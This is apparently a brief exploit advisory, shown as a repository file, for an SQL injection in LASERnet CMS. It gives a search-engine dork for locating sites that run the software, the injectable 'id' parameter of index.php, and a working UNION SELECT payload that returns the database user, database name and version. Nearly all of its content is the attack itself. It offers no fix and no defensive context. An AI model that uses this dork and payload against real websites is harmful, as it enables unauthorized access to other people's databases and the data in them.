13 lines
341 B
Text
Executable file
13 lines
341 B
Text
Executable file
Title : LASERnet CMS Vulnerable to SQL Injection
|
|
Vendor : http://lasernet.gr/cms.php
|
|
Dork : intext:"Powered by Lasernet"
|
|
Category: WebApps
|
|
|
|
http://localhost.com/index.php?id=[SQL]
|
|
|
|
Demo:
|
|
http://localhost.com/index.php
|
|
?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+
|
|
|
|
|
|
|